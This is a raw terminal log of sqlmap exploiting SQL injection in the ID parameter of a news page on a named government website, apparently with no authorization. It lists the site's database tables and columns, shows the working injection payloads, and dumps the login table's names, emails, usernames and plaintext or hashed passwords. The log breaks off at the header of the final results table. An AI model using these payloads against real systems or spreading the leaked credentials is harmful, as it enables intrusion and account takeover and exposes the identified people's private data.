  555. [08:31:27] [INFO] retrieved: int(12)
  556. [08:31:27] [INFO] retrieved: Content
  557. [08:31:27] [INFO] retrieved: text
  558. [08:31:27] [INFO] retrieved: Date
  559. [08:31:28] [INFO] retrieved: date
  560. [08:31:28] [INFO] retrieved: Title
  561. [08:31:28] [INFO] retrieved: varchar(200)
  562. [08:31:28] [INFO] retrieved: pic
  563. [08:31:29] [INFO] retrieved: varchar(100)
  564. [08:31:29] [INFO] retrieved: display
  565. [08:31:29] [INFO] retrieved: varchar(50)
  566. [08:31:29] [INFO] fetching columns for table 'menugroup' in database 'nbrrigov_123'
  567. [08:31:30] [INFO] the SQL query used returns 2 entries
  568. [08:31:30] [INFO] retrieved: role_id
  569. [08:31:30] [INFO] retrieved: varchar(5)
  570. [08:31:30] [INFO] retrieved: menu_id
  571. [08:31:31] [INFO] retrieved: varchar(5)
  572. [08:31:31] [INFO] fetching columns for table 'annce' in database 'nbrrigov_123'
  573. [08:31:31] [INFO] the SQL query used returns 6 entries
  574. [08:31:31] [INFO] retrieved: ID
  575. [08:31:32] [INFO] retrieved: int(12)
  576. [08:31:32] [INFO] retrieved: Content
  577. [08:31:32] [INFO] retrieved: text
  578. [08:31:32] [INFO] retrieved: Date
  579. [08:31:33] [INFO] retrieved: date
  580. [08:31:33] [INFO] retrieved: Title
  581. [08:31:33] [INFO] retrieved: varchar(200)
  582. [08:31:34] [INFO] retrieved: pic
  583. [08:31:34] [INFO] retrieved: varchar(100)
  584. [08:31:34] [INFO] retrieved: display
  585. [08:31:34] [INFO] retrieved: varchar(50)
  586. [08:31:34] [INFO] fetching columns for table 'lga' in database 'nbrrigov_123'
  587. [08:31:35] [INFO] the SQL query used returns 3 entries
  588. [08:31:35] [INFO] retrieved: Lgaid
  589. [08:31:35] [INFO] retrieved: int(11)
  590. [08:31:36] [INFO] retrieved: Lga
  591. [08:31:36] [INFO] retrieved: varchar(50)
  592. [08:31:36] [INFO] retrieved: State
  593. [08:31:36] [INFO] retrieved: varchar(50)
  594. [08:31:36] [INFO] fetching columns for table 'link' in database 'nbrrigov_123'
  595. [08:31:37] [INFO] the SQL query used returns 3 entries
  596. [08:31:37] [INFO] retrieved: id
  597. [08:31:37] [INFO] retrieved: int(60)
  598. [08:31:38] [INFO] retrieved: LinkName
  599. [08:31:38] [INFO] retrieved: varchar(100)
  600. [08:31:38] [INFO] retrieved: link_order
  601. [08:31:38] [INFO] retrieved: varchar(100)
  602. [08:31:38] [INFO] fetching columns for table 'article' in database 'nbrrigov_123'
  603. [08:31:39] [INFO] the SQL query used returns 6 entries
  604. [08:31:39] [INFO] retrieved: Id
  605. [08:31:39] [INFO] retrieved: int(17)
  606. [08:31:40] [INFO] retrieved: Title
  607. [08:31:40] [INFO] retrieved: varchar(69)
  608. [08:31:40] [INFO] retrieved: Summary
  609. [08:31:40] [INFO] retrieved: varchar(280)
  610. [08:31:41] [INFO] retrieved: Article
  611. [08:31:41] [INFO] retrieved: longtext
  612. [08:31:41] [INFO] retrieved: Dateposted
  613. [08:31:41] [INFO] retrieved: date
  614. [08:31:42] [INFO] retrieved: pics
  615. [08:31:42] [INFO] retrieved: varchar(100)
  616. [08:31:42] [INFO] fetching columns for table 'gallery' in database 'nbrrigov_123'
  617. [08:31:42] [INFO] the SQL query used returns 5 entries
  618. [08:31:43] [INFO] retrieved: id
  619. [08:31:43] [INFO] retrieved: int(16)
  620. [08:31:43] [INFO] retrieved: eventTitle
  621. [08:31:43] [INFO] retrieved: varchar(300)
  622. [08:31:44] [INFO] retrieved: pics
  623. [08:31:44] [INFO] retrieved: varchar(100)
  624. [08:31:44] [INFO] retrieved: pictitle
  625. [08:31:45] [INFO] retrieved: varchar(250)
  626. [08:31:45] [INFO] retrieved: Date
  627. [08:31:45] [INFO] retrieved: date
  628. [08:31:45] [INFO] fetching columns for table 'hardtechn' in database 'nbrrigov_123'
  629. [08:31:45] [INFO] the SQL query used returns 6 entries
  630. [08:31:46] [INFO] retrieved: id
  631. [08:31:46] [INFO] retrieved: int(12)
  632. [08:31:46] [INFO] retrieved: tech_id
  633. [08:31:47] [INFO] retrieved: varchar(40)
  634. [08:31:47] [INFO] retrieved: TechName
  635. [08:31:47] [INFO] retrieved: varchar(80)
  636. [08:31:47] [INFO] retrieved: pic
  637. [08:31:48] [INFO] retrieved: varchar(12)
  638. [08:31:48] [INFO] retrieved: functions
  639. [08:31:48] [INFO] retrieved: text
  640. [08:31:48] [INFO] retrieved: technology_type
  641. [08:31:49] [INFO] retrieved: varchar(60)
  642. [08:31:49] [INFO] fetching columns for table 'nbrrireports' in database 'nbrrigov_123'
  643. [08:31:49] [INFO] the SQL query used returns 6 entries
  644. [08:31:49] [INFO] retrieved: id
  645. [08:31:50] [INFO] retrieved: int(12)
  646. [08:31:50] [INFO] retrieved: ReportNo
  647. [08:31:50] [INFO] retrieved: int(12)
  648. [08:31:50] [INFO] retrieved: Reportname
  649. [08:31:51] [INFO] retrieved: varchar(80)
  650. [08:31:51] [INFO] retrieved: Abstract
  651. [08:31:51] [INFO] retrieved: text
  652. [08:31:52] [INFO] retrieved: Authors
  653. [08:31:52] [INFO] retrieved: varchar(80)
  654. [08:31:52] [INFO] retrieved: pic
  655. [08:31:52] [INFO] retrieved: varchar(44)
  656. [08:31:52] [INFO] fetching columns for table 'country' in database 'nbrrigov_123'
  657. [08:31:53] [INFO] the SQL query used returns 2 entries
  658. [08:31:53] [INFO] retrieved: id
  659. [08:31:53] [INFO] retrieved: int(255) unsigned
  660. [08:31:54] [INFO] retrieved: country_name
  661. [08:31:54] [INFO] retrieved: varchar(255)
  662. [08:31:54] [INFO] fetching columns for table 'ggcat' in database 'nbrrigov_123'
  663. [08:31:54] [INFO] the SQL query used returns 2 entries
  664. [08:31:54] [INFO] retrieved: id
  665. [08:31:55] [INFO] retrieved: int(55)
  666. [08:31:55] [INFO] retrieved: Category
  667. [08:31:55] [INFO] retrieved: varchar(100)
  668. [08:31:55] [INFO] fetching columns for table 'doctype' in database 'nbrrigov_123'
  669. [08:31:56] [INFO] the SQL query used returns 2 entries
  670. [08:31:56] [INFO] retrieved: id
  671. [08:31:56] [INFO] retrieved: int(35)
  672. [08:31:56] [INFO] retrieved: documents
  673. [08:31:57] [INFO] retrieved: varchar(99)
  674. [08:31:57] [INFO] fetching columns for table 'menu' in database 'nbrrigov_123'
  675. [08:31:57] [INFO] the SQL query used returns 8 entries
  676. [08:31:57] [INFO] retrieved: menu_id
  677. [08:31:58] [INFO] retrieved: varchar(5)
  678. [08:31:58] [INFO] retrieved: menu_name
  679. [08:31:58] [INFO] retrieved: varchar(50)
  680. [08:31:58] [INFO] retrieved: menu_url
  681. [08:31:59] [INFO] retrieved: varchar(60)
  682. [08:31:59] [INFO] retrieved: parent_id
  683. [08:31:59] [INFO] retrieved: varchar(5)
  684. [08:31:59] [INFO] retrieved: parent_id2
  685. [08:32:00] [INFO] retrieved: varchar(5)
  686. [08:32:00] [INFO] retrieved: menu_level
  687. [08:32:00] [INFO] retrieved: char(1)
  688. [08:32:01] [INFO] retrieved: created
  689. [08:32:01] [INFO] retrieved: datetime
  690. [08:32:01] [INFO] retrieved: menu_order
  691. [08:32:01] [INFO] retrieved: int(3)
  692. [08:32:01] [INFO] fetching columns for table 'login' in database 'nbrrigov_123'
  693. [08:32:02] [INFO] the SQL query used returns 7 entries
  694. [08:32:02] [INFO] retrieved: ID
  695. [08:32:02] [INFO] retrieved: int(18)
  696. [08:32:03] [INFO] retrieved: username
  697. [08:32:03] [INFO] retrieved: varchar(25)
  698. [08:32:03] [INFO] retrieved: password
  699. [08:32:03] [INFO] retrieved: varchar(100)
  700. [08:32:04] [INFO] retrieved: name
  701. [08:32:04] [INFO] retrieved: varchar(35)
  702. [08:32:04] [INFO] retrieved: email
  703. [08:32:04] [INFO] retrieved: varchar(60)
  704. [08:32:05] [INFO] retrieved: level
  705. [08:32:05] [INFO] retrieved: varchar(25)
  706. [08:32:05] [INFO] retrieved: chk
  707. [08:32:06] [INFO] retrieved: varchar(60)
  708. [08:32:06] [INFO] fetching columns for table 'page' in database 'nbrrigov_123'
  709. [08:32:06] [INFO] the SQL query used returns 15 entries
  710. [08:32:06] [INFO] retrieved: id
  711. [08:32:06] [INFO] retrieved: int(24)
  712. [08:32:07] [INFO] retrieved: app_id
  713. [08:32:07] [INFO] retrieved: varchar(40)
  714. [08:32:07] [INFO] retrieved: Pagetitle
  715. [08:32:08] [INFO] retrieved: varchar(80)
  716. [08:32:08] [INFO] retrieved: Mainpage
  717. [08:32:08] [INFO] retrieved: varchar(100)
  718. [08:32:08] [INFO] retrieved: linktype
  719. [08:32:09] [INFO] retrieved: varchar(100)
  720. [08:32:09] [INFO] retrieved: linkorder
  721. [08:32:09] [INFO] retrieved: varchar(100)
  722. [08:32:09] [INFO] retrieved: pics1
  723. [08:32:10] [INFO] retrieved: varchar(100)
  724. [08:32:10] [INFO] retrieved: Pics2
  725. [08:32:10] [INFO] retrieved: varchar(100)
  726. [08:32:11] [INFO] retrieved: Maincontent
  727. [08:32:11] [INFO] retrieved: text
  728. [08:32:11] [INFO] retrieved: Content1
  729. [08:32:11] [INFO] retrieved: text
  730. [08:32:12] [INFO] retrieved: Content2
  731. [08:32:12] [INFO] retrieved: text
  732. [08:32:12] [INFO] retrieved: Content3
  733. [08:32:13] [INFO] retrieved: text
  734. [08:32:13] [INFO] retrieved: Display
  735. [08:32:13] [INFO] retrieved: text
  736. [08:32:13] [INFO] retrieved: datecreated
  737. [08:32:14] [INFO] retrieved: date
  738. [08:32:14] [INFO] retrieved: Pagegroup
  739. [08:32:14] [INFO] retrieved: varchar(60)
  740. Database: nbrrigov_123
  741. Table: login_copy
  742. [7 columns]
  743. +----------+--------------+
  744. | Column | Type |
  745. +----------+--------------+
  746. | level | varchar(25) |
  747. | chk | varchar(60) |
  748. | email | varchar(60) |
  749. | ID | int(18) |
  750. | name | varchar(35) |
  751. | password | varchar(100) |
  752. | username | varchar(25) |
  753. +----------+--------------+
  754.  
  755. Database: nbrrigov_123
  756. Table: userlogin
  757. [3 columns]
  758. +----------+-------------+
  759. | Column | Type |
  760. +----------+-------------+
  761. | ID | int(18) |
  762. | Password | varchar(56) |
  763. | Username | varchar(49) |
  764. +----------+-------------+
  765.  
  766. Database: nbrrigov_123
  767. Table: states
  768. [2 columns]
  769. +---------+----------+
  770. | Column | Type |
  771. +---------+----------+
  772. | capital | char(20) |
  773. | state | char(20) |
  774. +---------+----------+
  775.  
  776. Database: nbrrigov_123
  777. Table: parameter
  778. [5 columns]
  779. +-----------------------+--------------+
  780. | Column | Type |
  781. +-----------------------+--------------+
  782. | created | datetime |
  783. | parameter_description | varchar(150) |
  784. | parameter_name | varchar(50) |
  785. | parameter_value | varchar(100) |
  786. | privilege_flag | char(1) |
  787. +-----------------------+--------------+
  788.  
  789. Database: nbrrigov_123
  790. Table: article
  791. [6 columns]
  792. +------------+--------------+
  793. | Column | Type |
  794. +------------+--------------+
  795. | Article | longtext |
  796. | Dateposted | date |
  797. | Id | int(17) |
  798. | pics | varchar(100) |
  799. | Summary | varchar(280) |
  800. | Title | varchar(69) |
  801. +------------+--------------+
  802.  
  803. Database: nbrrigov_123
  804. Table: category
  805. [3 columns]
  806. +----------+--------------+
  807. | Column | Type |
  808. +----------+--------------+
  809. | Category | varchar(200) |
  810. | ID | int(18) |
  811. | Type | varchar(200) |
  812. +----------+--------------+
  813.  
  814. Database: nbrrigov_123
  815. Table: userdata
  816. [41 columns]
  817. +-------------------+--------------+
  818. | Column | Type |
  819. +-------------------+--------------+
  820. | acct_no | varchar(20) |
  821. | activation_status | tinyint(1) |
  822. | address | text |
  823. | authorize_status | char(1) |
  824. | created | datetime |
  825. | day_1 | char(1) |
  826. | day_2 | char(1) |
  827. | day_3 | char(1) |
  828. | day_4 | char(1) |
  829. | day_5 | char(1) |
  830. | day_6 | char(1) |
  831. | day_7 | char(1) |
  832. | email | varchar(100) |
  833. | extend_wh | varchar(11) |
  834. | firstname | varchar(60) |
  835. | hint_answer | varchar(100) |
  836. | hint_question | varchar(100) |
  837. | ip_history | text |
  838. | issuer_code | varchar(3) |
  839. | last_used | datetime |
  840. | lastname | varchar(60) |
  841. | login_history | text |
  842. | login_status | char(1) |
  843. | mobile_phone | varchar(20) |
  844. | modified | datetime |
  845. | override_wh | char(1) |
  846. | pass_change | char(1) |
  847. | pass_dateexpire | date |
  848. | pass_expire | varchar(1) |
  849. | passchg_logon | char(1) |
  850. | password | varchar(100) |
  851. | pin_missed | int(2) |
  852. | posted_user | varchar(40) |
  853. | role_id | varchar(20) |
  854. | role_name | varchar(40) |
  855. | sch_code | varchar(50) |
  856. | station_code | varchar(25) |
  857. | user_disabled | char(1) |
  858. | user_locked | char(1) |
  859. | user_type | char(1) |
  860. | username | varchar(30) |
  861. +-------------------+--------------+
  862.  
  863. Database: nbrrigov_123
  864. Table: page_copy
  865. [14 columns]
  866. +-------------+--------------+
  867. | Column | Type |
  868. +-------------+--------------+
  869. | connect | varchar(60) |
  870. | Content1 | text |
  871. | Content2 | text |
  872. | Content3 | text |
  873. | datecreated | date |
  874. | Display | text |
  875. | id | int(24) |
  876. | linkorder | varchar(100) |
  877. | linktype | varchar(100) |
  878. | Maincontent | text |
  879. | Mainpage | varchar(100) |
  880. | Pagetitle | varchar(80) |
  881. | pics1 | varchar(100) |
  882. | Pics2 | varchar(100) |
  883. +-------------+--------------+
  884.  
  885. Database: nbrrigov_123
  886. Table: anny
  887. [7 columns]
  888. +---------+--------------+
  889. | Column | Type |
  890. +---------+--------------+
  891. | Date | date |
  892. | code | varchar(60) |
  893. | Content | text |
  894. | display | varchar(50) |
  895. | ID | int(12) |
  896. | pic | varchar(100) |
  897. | Title | varchar(200) |
  898. +---------+--------------+
  899.  
  900. Database: nbrrigov_123
  901. Table: enquiry
  902. [4 columns]
  903. +---------+--------------+
  904. | Column | Type |
  905. +---------+--------------+
  906. | Comment | varchar(250) |
  907. | Email | varchar(65) |
  908. | id | int(15) |
  909. | Name | varchar(60) |
  910. +---------+--------------+
  911.  
  912. Database: nbrrigov_123
  913. Table: eventtype
  914. [2 columns]
  915. +----------+--------------+
  916. | Column | Type |
  917. +----------+--------------+
  918. | category | varchar(180) |
  919. | id | int(55) |
  920. +----------+--------------+
  921.  
  922. Database: nbrrigov_123
  923. Table: comments
  924. [5 columns]
  925. +----------+--------------+
  926. | Column | Type |
  927. +----------+--------------+
  928. | comments | text |
  929. | Email | varchar(100) |
  930. | ID | int(18) |
  931. | Name | varchar(100) |
  932. | visible | varchar(120) |
  933. +----------+--------------+
  934.  
  935. Database: nbrrigov_123
  936. Table: role
  937. [4 columns]
  938. +--------------+-------------+
  939. | Column | Type |
  940. +--------------+-------------+
  941. | created | datetime |
  942. | role_enabled | char(1) |
  943. | role_id | varchar(5) |
  944. | role_name | varchar(60) |
  945. +--------------+-------------+
  946.  
  947. Database: nbrrigov_123
  948. Table: gendata
  949. [2 columns]
  950. +------------+-------------+
  951. | Column | Type |
  952. +------------+-------------+
  953. | table_id | int(11) |
  954. | table_name | varchar(30) |
  955. +------------+-------------+
  956.  
  957. Database: nbrrigov_123
  958. Table: mail
  959. [3 columns]
  960. +--------+-------------+
  961. | Column | Type |
  962. +--------+-------------+
  963. | email | varchar(80) |
  964. | id | int(18) |
  965. | name | varchar(60) |
  966. +--------+-------------+
  967.  
  968. Database: nbrrigov_123
  969. Table: document
  970. [9 columns]
  971. +----------+--------------+
  972. | Column | Type |
  973. +----------+--------------+
  974. | date | date |
  975. | category | varchar(25) |
  976. | created | datetime |
  977. | display | varchar(10) |
  978. | doc_id | varchar(40) |
  979. | doctitle | varchar(250) |
  980. | document | varchar(60) |
  981. | ID | int(16) |
  982. | officer | varchar(40) |
  983. +----------+--------------+
  984.  
  985. Database: nbrrigov_123
  986. Table: events
  987. [14 columns]
  988. +---------------+--------------+
  989. | Column | Type |
  990. +---------------+--------------+
  991. | Author | varchar(35) |
  992. | content | text |
  993. | dateposted | date |
  994. | Display | varchar(5) |
  995. | event_id | varchar(40) |
  996. | eventDuration | varchar(100) |
  997. | eventTitle | text |
  998. | eventType | varchar(85) |
  999. | file | text |
  1000. | ID | int(18) |
  1001. | officer | varchar(40) |
  1002. | PaperTitle | varchar(256) |
  1003. | StartDate | date |
  1004. | Status | varchar(25) |
  1005. +---------------+--------------+
  1006.  
  1007. Database: nbrrigov_123
  1008. Table: announcementt
  1009. [6 columns]
  1010. +---------+--------------+
  1011. | Column | Type |
  1012. +---------+--------------+
  1013. | Date | date |
  1014. | Content | text |
  1015. | display | varchar(50) |
  1016. | ID | int(12) |
  1017. | pic | varchar(100) |
  1018. | Title | varchar(200) |
  1019. +---------+--------------+
  1020.  
  1021. Database: nbrrigov_123
  1022. Table: menugroup
  1023. [2 columns]
  1024. +---------+------------+
  1025. | Column | Type |
  1026. +---------+------------+
  1027. | menu_id | varchar(5) |
  1028. | role_id | varchar(5) |
  1029. +---------+------------+
  1030.  
  1031. Database: nbrrigov_123
  1032. Table: annce
  1033. [6 columns]
  1034. +---------+--------------+
  1035. | Column | Type |
  1036. +---------+--------------+
  1037. | Date | date |
  1038. | Content | text |
  1039. | display | varchar(50) |
  1040. | ID | int(12) |
  1041. | pic | varchar(100) |
  1042. | Title | varchar(200) |
  1043. +---------+--------------+
  1044.  
  1045. Database: nbrrigov_123
  1046. Table: lga
  1047. [3 columns]
  1048. +--------+-------------+
  1049. | Column | Type |
  1050. +--------+-------------+
  1051. | Lga | varchar(50) |
  1052. | Lgaid | int(11) |
  1053. | State | varchar(50) |
  1054. +--------+-------------+
  1055.  
  1056. Database: nbrrigov_123
  1057. Table: link
  1058. [3 columns]
  1059. +------------+--------------+
  1060. | Column | Type |
  1061. +------------+--------------+
  1062. | id | int(60) |
  1063. | link_order | varchar(100) |
  1064. | LinkName | varchar(100) |
  1065. +------------+--------------+
  1066.  
  1067. Database: nbrrigov_123
  1068. Table: news
  1069. [12 columns]
  1070. +---------------+--------------+
  1071. | Column | Type |
  1072. +---------------+--------------+
  1073. | ID | int(16) |
  1074. | news_content | text |
  1075. | news_date | date |
  1076. | news_display | tinyint(1) |
  1077. | news_file | varchar(80) |
  1078. | news_id | varchar(80) |
  1079. | news_main | varchar(5) |
  1080. | news_pic | varchar(80) |
  1081. | news_postedby | varchar(80) |
  1082. | news_source | varchar(85) |
  1083. | news_summary | varchar(350) |
  1084. | news_title | varchar(250) |
  1085. +---------------+--------------+
  1086.  
  1087. Database: nbrrigov_123
  1088. Table: gallery
  1089. [5 columns]
  1090. +------------+--------------+
  1091. | Column | Type |
  1092. +------------+--------------+
  1093. | Date | date |
  1094. | eventTitle | varchar(300) |
  1095. | id | int(16) |
  1096. | pics | varchar(100) |
  1097. | pictitle | varchar(250) |
  1098. +------------+--------------+
  1099.  
  1100. Database: nbrrigov_123
  1101. Table: hardtechn
  1102. [6 columns]
  1103. +-----------------+-------------+
  1104. | Column | Type |
  1105. +-----------------+-------------+
  1106. | functions | text |
  1107. | id | int(12) |
  1108. | pic | varchar(12) |
  1109. | tech_id | varchar(40) |
  1110. | TechName | varchar(80) |
  1111. | technology_type | varchar(60) |
  1112. +-----------------+-------------+
  1113.  
  1114. Database: nbrrigov_123
  1115. Table: nbrrireports
  1116. [6 columns]
  1117. +------------+-------------+
  1118. | Column | Type |
  1119. +------------+-------------+
  1120. | Abstract | text |
  1121. | Authors | varchar(80) |
  1122. | id | int(12) |
  1123. | pic | varchar(44) |
  1124. | Reportname | varchar(80) |
  1125. | ReportNo | int(12) |
  1126. +------------+-------------+
  1127.  
  1128. Database: nbrrigov_123
  1129. Table: country
  1130. [2 columns]
  1131. +--------------+-------------------+
  1132. | Column | Type |
  1133. +--------------+-------------------+
  1134. | country_name | varchar(255) |
  1135. | id | int(255) unsigned |
  1136. +--------------+-------------------+
  1137.  
  1138. Database: nbrrigov_123
  1139. Table: ggcat
  1140. [2 columns]
  1141. +----------+--------------+
  1142. | Column | Type |
  1143. +----------+--------------+
  1144. | Category | varchar(100) |
  1145. | id | int(55) |
  1146. +----------+--------------+
  1147.  
  1148. Database: nbrrigov_123
  1149. Table: doctype
  1150. [2 columns]
  1151. +-----------+-------------+
  1152. | Column | Type |
  1153. +-----------+-------------+
  1154. | documents | varchar(99) |
  1155. | id | int(35) |
  1156. +-----------+-------------+
  1157.  
  1158. Database: nbrrigov_123
  1159. Table: menu
  1160. [8 columns]
  1161. +------------+-------------+
  1162. | Column | Type |
  1163. +------------+-------------+
  1164. | created | datetime |
  1165. | menu_id | varchar(5) |
  1166. | menu_level | char(1) |
  1167. | menu_name | varchar(50) |
  1168. | menu_order | int(3) |
  1169. | menu_url | varchar(60) |
  1170. | parent_id | varchar(5) |
  1171. | parent_id2 | varchar(5) |
  1172. +------------+-------------+
  1173.  
  1174. Database: nbrrigov_123
  1175. Table: login
  1176. [7 columns]
  1177. +----------+--------------+
  1178. | Column | Type |
  1179. +----------+--------------+
  1180. | level | varchar(25) |
  1181. | chk | varchar(60) |
  1182. | email | varchar(60) |
  1183. | ID | int(18) |
  1184. | name | varchar(35) |
  1185. | password | varchar(100) |
  1186. | username | varchar(25) |
  1187. +----------+--------------+
  1188.  
  1189. Database: nbrrigov_123
  1190. Table: page
  1191. [15 columns]
  1192. +-------------+--------------+
  1193. | Column | Type |
  1194. +-------------+--------------+
  1195. | app_id | varchar(40) |
  1196. | Content1 | text |
  1197. | Content2 | text |
  1198. | Content3 | text |
  1199. | datecreated | date |
  1200. | Display | text |
  1201. | id | int(24) |
  1202. | linkorder | varchar(100) |
  1203. | linktype | varchar(100) |
  1204. | Maincontent | text |
  1205. | Mainpage | varchar(100) |
  1206. | Pagegroup | varchar(60) |
  1207. | Pagetitle | varchar(80) |
  1208. | pics1 | varchar(100) |
  1209. | Pics2 | varchar(100) |
  1210. +-------------+--------------+
  1211.  
  1212. [08:32:14] [INFO] fetched data logged to text files under '/root/.sqlmap/output/www.nbrri.gov.ng'
  1213. root@BitCoin:/home/helmi# sqlmap -u http://www.nbrri.gov.ng/sites/news.php?ID=57 -D nbrrigov_123 -T login -C name,password,username,email,id --dump
  1214. _
  1215. ___ ___| |_____ ___ ___ {1.0.4.0#dev}
  1216. |_ -| . | | | .'| . |
  1217. |___|_ |_|_|_|_|__,| _|
  1218. |_| |_| http://sqlmap.org
  1219.  
  1220. [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
  1221.  
  1222. [*] starting at 08:34:02
  1223.  
  1224. [08:34:02] [INFO] resuming back-end DBMS 'mysql'
  1225. [08:34:02] [INFO] testing connection to the target URL
  1226. [08:34:05] [INFO] heuristics detected web page charset 'ISO-8859-2'
  1227. sqlmap resumed the following injection point(s) from stored session:
  1228. ---
  1229. Parameter: ID (GET)
  1230. Type: boolean-based blind
  1231. Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
  1232. Payload: ID=57 RLIKE (SELECT (CASE WHEN (3840=3840) THEN 57 ELSE 0x28 END))
  1233.  
  1234. Type: error-based
  1235. Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)
  1236. Payload: ID=57 AND EXTRACTVALUE(1351,CONCAT(0x5c,0x71717a7171,(SELECT (ELT(1351=1351,1))),0x7178627071))
  1237.  
  1238. Type: AND/OR time-based blind
  1239. Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
  1240. Payload: ID=57 AND (SELECT * FROM (SELECT(SLEEP(5)))gPUK)
  1241. ---
  1242. [08:34:05] [INFO] the back-end DBMS is MySQL
  1243. web application technology: PHP 5.6.31, Apache 2.4.27
  1244. back-end DBMS: MySQL 5.1
  1245. [08:34:05] [INFO] fetching entries of column(s) 'email, id, name, password, username' for table 'login' in database 'nbrrigov_123'
  1246. [08:34:05] [INFO] the SQL query used returns 18 entries
  1247. [08:34:07] [INFO] retrieved: gga.sb52@gmail.com
  1248. [08:34:07] [INFO] retrieved: 2
  1249. [08:34:07] [INFO] retrieved: CHAOS RECONS
  1250. [08:34:07] [INFO] retrieved: 0xa6ba18356a193f2e
  1251. [08:34:08] [INFO] retrieved: ojo
  1252. [08:34:08] [INFO] retrieved: e_josseph@yahoo.com
  1253. [08:34:08] [INFO] retrieved: 3
  1254. [08:34:09] [INFO] retrieved: Emmanuel Joseph
  1255. [08:34:09] [INFO] retrieved: \\\\0621\\\\0621\\\\0649\\\\0621\\\\0621
  1256. [08:34:09] [INFO] retrieved: ejoseph
  1257. [08:34:10] [INFO] retrieved: hrowlands@sec.gov.ng
  1258. [08:34:10] [INFO] retrieved: 4
  1259. [08:34:10] [INFO] retrieved: henry rowlands
  1260. [08:34:10] [INFO] retrieved: 0xf1cb26aef1432520
  1261. [08:34:11] [INFO] retrieved: hrowlands
  1262. [08:34:11] [INFO] retrieved: ope@ope.com
  1263. [08:34:11] [INFO] retrieved: 5
  1264. [08:34:12] [INFO] retrieved: ope
  1265. [08:34:12] [INFO] retrieved: emrebaba
  1266. [08:34:12] [INFO] retrieved: opeyemi
  1267. [08:34:12] [INFO] retrieved: alf@afafag.com
  1268. [08:34:13] [INFO] retrieved: 6
  1269. [08:34:13] [INFO] retrieved: alfred ako
  1270. [08:34:13] [INFO] retrieved: emrebaba
  1271. [08:34:14] [INFO] retrieved: alfred
  1272. [08:34:14] [INFO] retrieved: clementyari@yahoo.com
  1273. [08:34:14] [INFO] retrieved: 7
  1274. [08:34:15] [INFO] retrieved: clement
  1275. [08:34:15] [INFO] retrieved: \\\\0621\\\\0621\\\\0649\\\\0621\\\\0621
  1276. [08:34:15] [INFO] retrieved: clement
  1277. [08:34:16] [INFO] retrieved: ponwualu@yahoo.com
  1278. [08:34:16] [INFO] retrieved: 8
  1279. [08:34:16] [INFO] retrieved: peteronwualu
  1280. [08:34:17] [INFO] retrieved: \\\\0621\\\\0621\\\\0649\\\\0621\\\\0621
  1281. [08:34:17] [INFO] retrieved: peteronwualu
  1282. [08:34:17] [INFO] retrieved: akabsuc@gmail.com
  1283. [08:34:18] [INFO] retrieved: 9
  1284. [08:34:18] [INFO] retrieved: Uchenna
  1285. [08:34:18] [INFO] retrieved: 0x108ad2e98fa5335d
  1286. [08:34:19] [INFO] retrieved: nbrriadmin
  1287. [08:34:19] [INFO] retrieved: webprince64@yahoo.com
  1288. [08:34:19] [INFO] retrieved: 10
  1289. [08:34:20] [INFO] retrieved: Admin
  1290. [08:34:20] [INFO] retrieved: \\\\0621\\\\0621\\\\0649\\\\0621\\\\0621
  1291. [08:34:20] [INFO] retrieved: nbrrilog
  1292. [08:34:21] [INFO] retrieved: webprince644@gmail.com
  1293. [08:34:21] [INFO] retrieved: 11
  1294. [08:34:22] [INFO] retrieved: 111111
  1295. [08:34:22] [INFO] retrieved: \\\\0621\\\\0621\\\\0649\\\\0621\\\\0621
  1296. [08:34:22] [INFO] retrieved: dayoxx
  1297. [08:34:23] [INFO] retrieved: webprince64@gmail.com
  1298. [08:34:23] [INFO] retrieved: 20
  1299. [08:34:23] [INFO] retrieved: Administrator
  1300. [08:34:24] [INFO] retrieved: \\\\0621\\\\0621\\\\0649\\\\0621\\\\0621
  1301. [08:34:24] [INFO] retrieved: adminnbrri
  1302. [08:34:25] [INFO] retrieved: ElSurveillance@twitter.com
  1303. [08:34:25] [INFO] retrieved: 21
  1304. [08:34:26] [INFO] retrieved: ElSurveillance
  1305. [08:34:26] [INFO] retrieved: \\\\0621\\\\0621\\\\0649\\\\0621\\\\0621
  1306. [08:34:26] [INFO] retrieved: ElsHacker
  1307. [08:34:27] [INFO] retrieved: abd@adddbd.com
  1308. [08:34:27] [INFO] retrieved: 22
  1309. [08:34:27] [INFO] retrieved: madleets
  1310. [08:34:28] [INFO] retrieved: \\\\0621\\\\0621\\\\0649\\\\0621\\\\0621
  1311. [08:34:28] [INFO] retrieved: madleets
  1312. [08:34:29] [INFO] retrieved: abseeimoostfaa@gmail.com
  1313. [08:34:29] [INFO] retrieved: 23
  1314. [08:34:29] [INFO] retrieved: sniper-ly
  1315. [08:34:29] [INFO] retrieved: 12345@
  1316. [08:34:30] [INFO] retrieved: sniper-ly
  1317. [08:34:30] [INFO] retrieved: pac@anonymous.com
  1318. [08:34:30] [INFO] retrieved: 24
  1319. [08:34:30] [INFO] retrieved: pacman
  1320. [08:34:31] [INFO] retrieved: dandikler
  1321. [08:34:31] [INFO] retrieved: ezekiel
  1322. [08:34:32] [INFO] retrieved: xandercapece@yahoo.com
  1323. [08:34:32] [INFO] retrieved: 25
  1324. [08:34:32] [INFO] retrieved: NigerianGamer27
  1325. [08:34:32] [INFO] retrieved: Nigeria
  1326. [08:34:33] [INFO] retrieved: NigerianFart
  1327. [08:34:33] [INFO] retrieved: aboofdgs58@gmail.com
  1328. [08:34:33] [INFO] retrieved: 26
  1329. [08:34:34] [INFO] retrieved: abood2011
  1330. [08:34:34] [INFO] retrieved: Aa0558802997
  1331. [08:34:34] [INFO] retrieved: abood2011
  1332. [08:34:35] [INFO] retrieved: webprince64@gmail.com
  1333. [08:34:35] [INFO] retrieved: 27
  1334. [08:34:35] [INFO] retrieved: Admin
  1335. [08:34:35] [INFO] retrieved: Ahmed11
  1336. [08:34:36] [INFO] retrieved: adnbrri
  1337. [08:34:36] [INFO] analyzing table dump for possible password hashes
  1338. Database: nbrrigov_123
  1339. Table: login
  1340. [18 entries]
  1341. +-----------------+--------------------------------+--------------+----------------------------+----+
  1342. | name | password | username | email | id |
  1343. +-----------------+--------------------------------+--------------+----------------------------+----+
